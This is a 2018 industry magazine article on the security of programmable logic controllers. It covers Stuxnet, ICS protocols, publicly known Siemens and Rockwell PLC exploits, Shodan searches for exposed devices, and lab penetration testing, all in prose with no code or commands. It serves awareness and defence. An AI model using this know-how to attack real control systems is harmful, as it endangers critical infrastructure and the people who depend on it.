CD1810-webcover-full
CD1810-webcover-full
CD1810-webcover-full
CD1810-webcover-full
CD1810-webcover-full

More exploits: the great PLC hack

Oct. 25, 2018
Vulnerabilities of industrial control systems

Industrial control systems and other operational technology (OT) make up the majority of industrial systems and critical infrastructure that are used to control the distribution of power, manufacture cars, control water flow in hydro power plants and control trains and subways. These systems are the core of our modern digitalized society, and, without the proper functioning of these systems, trains could collide, we could be without electricity, water dams could overflow, and robots could destroy the car during manufacturing.

Trillions of insecure industrial control systems and OT systems exist around the world, and a many of these systems are made up of programmable logic controllers (PLCs). PLCs are the components that manage and control the various steps in a manufacturing process and heavy machinery such as the top drive on an offshore drilling rig. PLCs are essential for industrial control systems and OT systems. From a cybersecurity perspective, what is interesting is whether it is possible to take control of a PLC and what damage it would be possible to inflict by doing so. Additionally, would it be possible to take control of the PLC remotely via the Internet?

The Stuxnet worm

To illustrate both how to attack a PLC and what the consequences of such could be, let us look at the Stuxnet worm. Stuxnet is a stand-alone computer worm, which only targeted Siemens’ supervisory control and data acquisition (SCADA) systems. The worm was designed to attack specific Siemens PLCs and made use of four zero-day vulnerabilities. The final version of Stuxnet was first discovered in Belarus in June 2010 by Sergey Ulasen from Kaspersky Labs. An earlier version of Stuxnet had already been discovered in 2009. However, the worm was developed much earlier, possibly even as early as 2005. Stuxnet was mainly designed to harm a nuclear plant located in Natanz, Iran. Unfortunately, Stuxnet spread to more than 115 countries, which illustrates how even a targeted attack could spread and cause damage outside of its core purpose.

The worm was specially constructed to change the rotor speed of the centrifuges inside the Natanz nuclear plant, eventually causing them to explode. What is interesting with Stuxnet is that it was a targeted worm, carefully designed to only cause harm if certain criteria were met, which means that most infected plants would not be harmed. In fact, Stuxnet would increase the rotor speed of the centrifuges only if the industrial control system’s architecture matched the nuclear plant in Natanz. Due to its design and complexity, Stuxnet has been defined as an advanced persistent threat (APT). An APT collects data and executes commands continuously over a long period of time without detection. This also is known as a “low and slow” attack.

The Stuxnet worm was brought into the Natanz facility through a USB flash drive, enabling it to attack the system from the inside. This was necessary and a prerequisite for the attack as the Natanz facility was not directly accessible from the Internet because there is no remote connection. Once the Natanz facility was infected, the worm first executed locally on the infected host, although it did not actually do anything to the infected host.

After execution, the worm spread to the entire network, until it found a Windows operating system running STEP 7. STEP 7 is the Siemens programming software designed for Siemens PLCs. The computer running STEP 7 is known as the control computer and directly interacts with and gives commands to the PLC. Once successfully arrived at the STEP 7 control computer, Stuxnet manipulated the code blocks sent from the control computer, executed dangerous commands on the PLC and made the centrifuges spin at a higher frequency than originally programmed. The attacks on the PLC were only executed approximately every 27 days to make the attack stealthy and difficult to detect, which indeed is a central part of an APT. Stuxnet also took over the control computer and displayed false output on the STEP 7 software. This attack step was a core part of the attack and known as deception. In this case, the engineers located at the nuclear plant did not receive any indication of errors, assuming the centrifuges were spinning at the correct frequency. By receiving false output in STEP 7, the engineers would assume the meltdown was caused by human error, rather than malware, and acted accordingly. Stuxnet also hid code directly on the PLC after infection and has therefore also been defined as a PLC rootkit.

One of the zero-day vulnerabilities used by Stuxnet targeted Windows operating systems. It was spread through the server-message-block (SMB) file-sharing protocol as documented in the vulnerability report CVE-2008-4250 in the National Vulnerability Database. The vulnerability allowed remote code execution, spreading aggressively across the local network. The worm had several other features, such as self-replication, updated itself using a command and control center, contained a Windows rootkit, which hid its binaries, and attempted to bypass security products.

Stuxnet is known as the world’s first digital weapon and destroyed approximately 1,000 centrifuges inside the Natanz power plant. Having cyber attacks causing physical damage revolutionized how cybersecurity experts perform threat analysis, as well as how PLC vendors design PLCs.

Hacking PLCs

Part of Stuxnet was to use the targeted PLCs as a hacker tool by means of a PLC rootkit and by manipulating the communication between the control computer and the PLC. By targeting both the control computer and the PLC, Stuxnet succeeded in achieving its goal and at the same time deceived the operators, buying enough time to destroy the centrifuges. Stuxnet as an APT is a sophisticated attack that requires both significant intelligence-gathering and resources to execute. It is also necessary to have insights into the proprietary communication protocols in use and insights into the architecture of the targeted PLCs, especially for crafting the PLC rootkit.

What makes Stuxnet so interesting is that its code is now publicly available and can be reused in other attacks. Stuxnet has also led to a significant increase in the number of available hacking courses for PLCs and industrial control systems. It is possible to take a course and learn how to hack PLCs and industrial control systems, in addition to how to use publicly available hacking tools such as the Metasploit framework.

An industrial control system (ICS) and a PLC make use of multiple communication protocols. Some of the most common protocols used are Profinet, Profibus and Modbus. Most protocols designed for ICS have been designed without any security measures built in, which could allow remote code execution, packet sniffing and replay attacks, due to the lack of authentication and encryption.

Profinet, or industrial Ethernet, uses the traditional Ethernet hardware, which makes it compatible with most equipment. Profinet is widely used in the automation industry, and its design is based on the Open Systems Interconnection (OSI) model. Profinet enables bi-directional communication and is the preferred communication protocol for the Siemens Simatic PLCs.

Profibus is an international fieldbus communication standard. It is used to link several devices together and allows bi-directional communication. There are two types of Profibus—Profibus Decentralized Peripherals (DP) and Profibus Process Automation (PA). One limitation with Profibus is that it is only able to communicate with one device at a time. The new version of Profibus is standardized in IEC 61158.

Modbus is a serial communications protocol that was designed and published by Modicon (Schneider Electric) in 1979. Modbus is referred to as master- and-slave communication, since one master can hold up to 247 slave devices. The control computer—HMI/engineering workstation—would typically be the master, while the automation devices, or PLCs, are the slaves. It was originally designed as a communication protocol for PLCs and later became an international standard for connecting together multiple industrial devices. Modbus is easy to deploy, cheap and designed for SCADA systems. There are three variations of the Modbus protocol: American Standard Code for Information Interchange (ASCII), remote terminal unit (RTU) and transmission control protocol/Internet protocol (TCP/IP).

Modbus uses user datagram protocol (UDP) by default at port 502 and is mostly used by Schneider Electric. There are several Metasploit scanners that allow detection and exploitation of Modbus. Furthermore, there are also Profinet scanners available in the Metasploit framework. Similar scanners coded in Python can also be found on GitHub. In 2011, Dillon Beresford, senior vulnerability research engineer at Dell, released remote exploits towards Siemens’ Simatic PLC series. These exploits were related to Profinet, which communicates using TCP port 102.

What is interesting with these exploits is that they dump and view memory, and they even execute on and off commands to the PLC’s central processing unit (CPU). An example is the remote-memory-viewer exploit, which authenticates using a hard-coded backdoor password in Siemens’ Simatic S7-300 PLC. In this exploit, the CPU start/stop module executes shellcode toward the PLC and turns it on/off remotely. The same start/stop exploit can be found for the S7-1200 series. Furthermore, by injecting shellcode, it is also possible to gain remote access to the PLC.

Due to the lack of integrity checks, older PLCs execute commands whether or not they are delivered from a legitimate source. The reason for this is that there are no checksums on the network packages. A range of replay attacks has been shown to work against a large number of PLCs, which allows the attacker to send execution commands remotely. Therefore, exploiting PLCs remotely with open-source tools is a major threat to SCADA systems. One of many reasons this is a huge problem is, if SCADA systems are suddenly turned off, the consequences can be severe for critical infrastructure. Different SCADA systems are dependent on soft and controlled shutdowns to not cause any damage to the mechanical equipment. On the bright side, these exploits have helped to raise awareness toward cybersecurity in critical infrastructure.

During Black Hat USA in 2011, Beresford introduced a live demo created for Siemens’ Simatic S7-300 and 1200 series. The exploits used during his demo are programmed in Ruby, which was made compatible with the Metasploit Framework. Other open-source tools such as “PLC scan” are also available for anyone to download and use in industrial control systems.

Remote exploits on ICS were an essential part of the Stuxnet worm. However, Beresford introduced how it is possible to gain remote access to a PLC by using the hardcoded password integrated into the software, which is taking things one step further than what was done in Stuxnet.

This is not purely a Siemens issue; Rockwell Automation has also experienced a stack-based overflow that could allow remote access to the system by injecting arbitrary code, according to CVE-2016-0868 of the National Vulnerability Database. The vulnerability was reported January 26, 2016, and was targeted toward the MicroLogix 1100 PLC. In addition, there are several other exploits and scanners available in the Metasploit project that can be used to remotely execute commands to different PLC models.

When it comes to the control computer, it can also be used as a hacker tool, mainly because of various software exploits, of which some will enable to take control of the engineering workstation in a SCADA system or ICS. This enables the attacker to pivot or manipulate the data sent to the PLC. An exploit created by James Fitts, contributor to the Exploit Database, allows a remote attacker to inject arbitrary code into Fatek’s PLC programming software, WinProladder, as documented CVE-2016-8377 of the National Vulnerability Database.

Even though the attacker could trigger the exploit remotely, it does still require user interaction, such as a visit to a malicious Web page or opening an infected file, to successfully take advantage of the exploit. The exploit is a stack-based overflow that is available in Ruby for Metasploit import. Applications programmed in C are often more vulnerable to buffer overflows than other programming languages, and there are many C-based software packages in use in industrial control systems. For example, injecting shellcode through a buffer overflow vulnerability can grant remote access to the system. It can also be used for privilege escalation.

Shodan and Internet-facing PLCs

Shodan is a search engine that is widely used by security experts and hackers to find different devices on the Internet. By using certain search terms, it is possible to find PLCs connected directly to the Internet. During a search for “Simatic” performed March 2, 2018, a total of 1,737 ICS devices were found.

Having an ICS reachable from the Internet represents a severe risk of exploitation, which could lead to remote access, sabotage and espionage. For example, an automated scanning based on search results from Shodan could identify all potential targets and eventually provide a suitable target into a specific critical infrastructure system or ICS. Furthermore, combining a Shodan search script with code from Stuxnet could potentially be a major risk for anyone with PLCs reachable either indirectly or directly from the Internet.

Are we screwed?

The lack of security in industrial control systems is a major concern to national security. A PLC was originally designed to only function as an automatic operator in an industrial control system and not to be connected to external components and reachable from the Internet. However, the evolution in ICS design has started to expose PLCs to the Internet, which can be shown through searches using tools such Shodan. PLCs rely on air-gapped networks and restricted physical access as a security measure.

Air-gapped networks have multiple times been shown to be a flawed design and are in no circumstance a legitimate security argument in modern ICS. This was proven by the Stuxnet attack, which spread to more than 115 countries, infecting critical infrastructure worldwide, even though most control systems were in principle designed as air-gapped. This change in ICS and critical-infrastructure environments means PLCs are exposed to a larger security threat than earlier.

Penetration testing

Securing an ICS environment, including the PLCs, is nontrivial, as these systems are not designed to be cyber-resilient. This means that one has to somehow integrate cybersecurity resilience measures into and around the ICS. Such measures include, for example, perimeter defense such as firewalls to reduce the risk of unwanted network traffic; network monitoring and preferably non-intrusive, ICS-specific, anomaly-based network monitoring as such systems are designed to not pose any additional load on ICS networks; and last but not least endpoint protection and monitoring to reduce the exposure PLCs have to attacks via remote connections and to detect any sign of attacks as early as possible. The latter requires some sort of ICS-specific endpoint protection and monitoring. But another very important aspect is to identify and understand the risks. What are the attack interfaces, attack methods and attacks and potential consequences? Additionally, it is important to evaluate and continuously re-evaluate the likelihood of potential attacks.

One method to gain insight into the risk exposure is penetration testing where the goal is to identify attack vectors and to test these attack vectors either on paper or in practice—so, attack the system. However, penetration testing in an ICS environment requires a careful approach that is significantly different than standard penetration testing techniques for IT systems. Industrial control systems contain sensitive equipment, such as PLCs. These devices have a sensitive processing unit, which may lead to freezing, configuration resets and faulting if stressed due to low stack handling.

Standard penetration testing such as a simple port scan performed by tools such as Nmap might be enough to overload the processing unit. Due to weak network stack handling, certain devices cannot handle the number of network packages generated by Nmap and similar tools. Therefore, it is best practice to not perform penetration testing on a live ICS environment. ICS penetration testing should be performed only in a controlled lab environment.

There are many penetration testing methodologies to choose from, although few tailored for ICS. One ICS-friendly methodology is the zero-entry methodology for penetration testing. The zero-entry methodology is comprised of four steps: reconnaissance, scanning, exploitation and post-exploitation.

Post-exploitation might involve maintaining access to the system, which is what an APT does when establishing a path for the control-and-command-center communication, which is used to send intelligence information on the target system and to upload new exploits/malware. Furthermore, covering your tracks to hide your attack steps are in many sophisticated attacks the fifth step.

Reconnaissance focuses on gathering information about the target, such as IP address and domain-name-system (DNS) records, and reading about common vulnerabilities for the target PLCs. Scanning involves actively scanning the target for open ports, detecting operating system and running services.

Nmap, including the Nmap Script Engine (NSE), is an example of a tool that is often used for scanning. In case a vulnerability is found, the attack moves forward to exploitation. In most cases, such vulnerabilities are used to gain access to the system through different services running on the PLC. After exploiting the vulnerability, it is preferable to make the access persistent. However, not all services give the opportunity to create a persistent backdoor.

For many PLCs, it is possible to extract details about the PLC using a controlled Nmap scan toward the PLC. This must be performed with care to avoid interrupting the PLC. We have a lab setup where we perform controlled penetration testing on PLCs and other ICS equipment.

In one of our penetration tests, the Nmap scan revealed MAC address, hardware and firmware information (Figure 1). Also, the scan revealed that Port 80, 102 and 443 were open. By using different scripts in the Nmap Script Engine (NSE), we were able to extract detailed information about the firmware, hardware, MAC address and serial number. This detailed information can be used to develop exploits and to investigate vulnerabilities toward the specific PLC series.

Nmap scan

Figure 1: Detailed information can be used to develop exploits and to investigate vulnerabilities toward the specific PLC series.

We used the result from the Nmap scan to investigate vulnerabilities, for which many are reported and discussed in the National Vulnerability Database. After discovering and exploiting vulnerabilities, it is in many cases possible to crack the password and also to gain access to the PLC and shut it down.

ALSO READ: How safe are your controllers?

Bibliography

Langner, R. 2013. To kill a centrifuge. The Langner Group, Tech. Rep. https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Mueller, P. and Yadegari, B. 2012. The Stuxnet Worm. Département des sciences de l’informatique, Université de l’Arizona. https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2013/Resources/presentations/2012/topic9-final/report.pdf

Falliere, N., Murchu, L. O. and Chien, E. 2011. W32. Stuxnet dossier. White paper, Symantec Corp. Security Response, 5, 29.

Hu, P. Li, H. Fu, H. Cansever, D. and Mohapatra, P. Dynamic defense strategy against advanced persistent threat with insiders. Computer Communications (INFOCOM), 2015 IEEE Conference on, 2015. IEEE, 747-755.

Falliere, N. 2010. Exploring Stuxnet‘s PLC Infection Process. Symantec blog entry. http://daveschull.com/wp-content/uploads/2015/05/Exploring-Stuxnet.pdf

National Vulnerability Database. 2008. CVE-2008-4250 Detail. https://nvd.nist.gov/vuln/detail/cve-2008-4250

Matrosov, A., Rodionov, E. Harley, D. and Malcho, J. 2010. Stuxnet under the microscope. ESET LLC (September 2010). http://www.rpac.in/image/ITR%201.pdf

Denning, D. E. 2012. Stuxnet: What has changed? Future Internet, 4, 672-687. http://www.mdpi.com/1999-5903/4/3/672/htm

Fidler, D. P. 2011. Was stuxnet an act of war? Decoding a cyberattack. IEEE Security & Privacy, 9, 56-59. https://pdfs.semanticscholar.org/8182/ff717efd66ac92b870d0cd47a4194d4e6aa6.pdf

Chen, T. M. and Abu-Nimeh, S. 2011. Lessons from stuxnet. Computer, 44, 91-93. http://openaccess.city.ac.uk/8203/1/ieee-computer-april-2011.pdf

Kennedy, D. O'Gorman, J., Kearns, D. and Aharoni, M. 2011. Metasploit - The Penetration Tester's Guide. No starch press.

Stouffer, K. Falco, J. and Scarfone, K. 2011. Guide to industrial control systems (ICS) security. NIST special publication, 800, 16-16. http://www.gocs.com.de/pages/fachberichte/archiv/164-sp800_82_r2_draft.pdf

Beresford, D. 2011. Exploiting Siemens Simatic S7 PLCs. Black Hat USA 2011. Las Vegas 16, 723-733.

Briscoe, N. 2000. Understanding the OSI 7-layer model. PC Network Advisor, 120.

Siemens. 2017. S7-1200 Communication. Siemens. https://w3.siemens.com/mcms/programmable-logic-controller/en/basic-controller/s7-1200/communication/pages/default_vor_tabs.aspx#Description

Igure, V. M. Laughter, S. A. and Williams, R. D. 2006. Security issues in SCADA networks. Computers & Security, 25, 498-506. https://pdfs.semanticscholar.org/ea0d/2e22439c0dac5c667bdb9b8344e281cc7dac.pdf

Profibus. 2017. Profibus standardized in IEC 61158. https://www.profibus.com/technology/profibus/

Panchal, P. and Patel, A. 2015. Interfacing of PLC with NI-LabVIEW using Modbus Protocol. ETCEE–2015, 54.
https://www.researchgate.net/profile/Alpesh_Patel16/publication/282986115_PI_control_of_level_control_system_using_PLC_and_LabVIEW_based_SCADA/links/570e117608ae3199889cb0d4.pdf

Bodungen, C. S., Aaron; Wilhoit, Kyle; Hilt, Stephen; Singer, Bryan L. 2016. Hacking Exposed Industrial Control Systems: ICS and SCADA Security Secrets & Solutions, McGraw-Hill Education.

Kennedy, D. O'Gorman, J., Kearns, D. and Aharoni, M. 2011. Metasploit - The Penetration Tester's Guide. No starch press.

Wilhoit, K. 2013. Who’s Really Attacking Your ICS Equipment? Trend Micro, 10.

National Vulnerability Database. 2016. CVE-2016-0868 Detail. https://nvd.nist.gov/vuln/detail/CVE-2016-0868

National Vulnerability Database. 2016. CVE-2016-8377 Detail. https://nvd.nist.gov/vuln/detail/CVE-2016-8377

Black, P. E. and Bojanova, I. 2016. Defeating Buffer Overflow: A Trivial but Dangerous Bug. IT professional, 18, 58-61.

Shodan. 2017. What is Shodan? Shodan. https://help.shodan.io/the-basics/what-is-shodan

Ercolani, V. 2017. A Survey of Shodan Data. University of Arizona.

Engebretson, P. 2013. The basics of hacking and penetration testing, Waltham, Syngress.

Regalado, D. Harris, S. Harper, A. Eagle, C. Ness, J. Spasojevic, B. Linn, R. and Sims, S. 2015. Gray Hat Hacking - The Ethical Hacker's Handbook. McGraw-Hill Education Group.

About the author: Dr. Siv Hilde Houmb
Dr. Siv Hilde Houmb is associate professor at the Norwegian University of Science and Technology (NTNU) in Gjøvik, Norway. She has a Ph.D. in computer science, focusing on cybersecurity and decision theory, and is the CTO of Secure-NOK, which she founded in 2010. She has an extensive background in controls security and cybersecurity, including penetration testing, risk assessment, security protocol development and ethical hacking. She’s published more than 50 scientific papers and articles on cybersecurity and risk assessment.

Dr. Houmb worked as a security specialist and risk analyst in Telenor from 1999 to 2011, was a guest researcher at Colorado State University from 2004 to 2006 and held a post-doctoral at the University of Twente in the Netherlands from 2007 to 2008. She has served as a security specialist for the European Telecommunication Standards Institute (ETSI) and the European Commission (EC) on topics such as RFID, car-to-car communications, privacy impact assessments, risk assessment and security evaluations of new and emerging ICT technologies. Dr. Houmb leads the cybersecurity committee at the International Association of Drilling Contractors (IADC) and works with the U.S. Coast Guard (USCG) and the National Institute for Standards and Technologies (NIST) on cybersecurity standardization and regulation of oil and gas, maritime and critical manufacturing. Dr. Houmb also is the editor of the two first international cybersecurity guidelines for the drilling industry, published by IADC.

About the author: Erik David Martin
Erik David Martin is an IT security student at Noroff Education located in Stavanger, Norway. He is currently working on a bachelor’s degree in computer security and will finish his degree at the University of South Wales. He collaborated with Dr. Houmb during his end-semester thesis in 2018 where hacking and exploitation of PLCs was in focus. Martin had a summer internship at Secure-NOK AS shortly after finishing the thesis. The internship involved further security research of PLCs and building a demo kit, which should be used for demonstrations during security conferences and stands. The demo kit involved a Python-based GUI program that automatically attacked a PLC by using the graphical interface and different communication libraries. He has also contributed to Exploit Database by finding a vulnerability and submitting a Python-based exploit.